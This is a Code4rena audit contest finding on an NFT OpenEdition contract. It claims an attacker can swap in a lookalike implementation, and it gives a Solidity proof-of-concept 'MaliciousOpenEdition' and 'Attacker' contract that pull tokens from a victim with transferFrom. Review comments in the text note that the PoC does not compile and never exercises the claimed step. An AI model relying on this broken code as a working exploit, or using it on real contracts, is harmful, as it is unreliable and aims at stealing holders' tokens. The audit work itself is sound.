Platform: Code4rena
Start Date: 06/12/2022
Pot Size: $36,500 USDC
Total HM: 16
Participants: 119
Period: 3 days
Judge: berndartmueller
Total Solo HM: 2
Id: 189
League: ETH
Rank: 54/119
Findings: 1
Award: $57.63
🌟 Selected for report: 0
🚀 Solo Findings: 0
57.6274 USDC - $57.63
An attacker may be able to set the implementation contract to a different contract that has the same function signatures, which could cause unexpected behavior when new OpenEdition contracts are created.
pragma solidity ^0.8.17;
import {OpenEdition} from "./OpenEdition.sol"; import {IEscher721} from "../interfaces/IEscher721.sol";
contract MaliciousOpenEdition is OpenEdition {
    // The malicious contract should have the same function signatures as the OpenEdition contract
    // (it gets them by inheriting from OpenEdition and then adds the members below).

    // Attacker-controlled variables
    // NOTE(review): nothing in this contract writes either variable, so both keep their
    // zero defaults unless some other code sets them.
    address public victim;
    uint256 public stolenTokens;

    // Function to steal tokens from the victim.
    // Reverts with "VICTIM NOT SET" while `victim` is the zero address and with
    // "INVALID TOKEN AMOUNT" while `stolenTokens` is zero.
    function stealTokens() public {
        require(victim != address(0), "VICTIM NOT SET");
        require(stolenTokens > 0, "INVALID TOKEN AMOUNT");
        // Steal tokens from the victim
        // `token` is not declared in this listing; presumably inherited from OpenEdition (confirm).
        // NOTE(review): `stolenTokens` is checked as an amount but passed as the third argument of
        // transferFrom; if IEscher721 follows ERC-721 that argument is a token id, and the call
        // only succeeds when this contract is already approved for it (confirm against the interface).
        IEscher721(token).transferFrom(victim, address(this), stolenTokens);
    }
}
// Attacker contract
// NOTE(review): neither contract in this listing calls anything that sets an implementation
// address, so the listing does not exercise the step the finding describes.
contract Attacker {
    // Create an instance of the MaliciousOpenEdition contract
    MaliciousOpenEdition public malicious = new MaliciousOpenEdition();

    // Set the victim and stolen token amount in the MaliciousOpenEdition contract
    // NOTE(review): `victim` and `stolenTokens` are public state variables of another contract,
    // which are exposed externally only as getter functions; the two assignments below are not
    // valid Solidity, so the listing does not compile as written.
    function setVictim(address payable _victim, uint256 _stolenTokens) public {
        malicious.victim = _victim;
        malicious.stolenTokens = _stolenTokens;
    }

    // Steal tokens from the victim (forwards to MaliciousOpenEdition.stealTokens)
    function stealTokens() public {
        malicious.stealTokens();
    }
}
It is important to properly verify that the implementation is an instance of OpenEdition; matching function signatures alone does not establish that.
#0 - c4-judge
2022-12-13T11:56:53Z
berndartmueller marked the issue as duplicate of #176
#1 - c4-judge
2023-01-03T09:54:18Z
berndartmueller marked the issue as satisfactory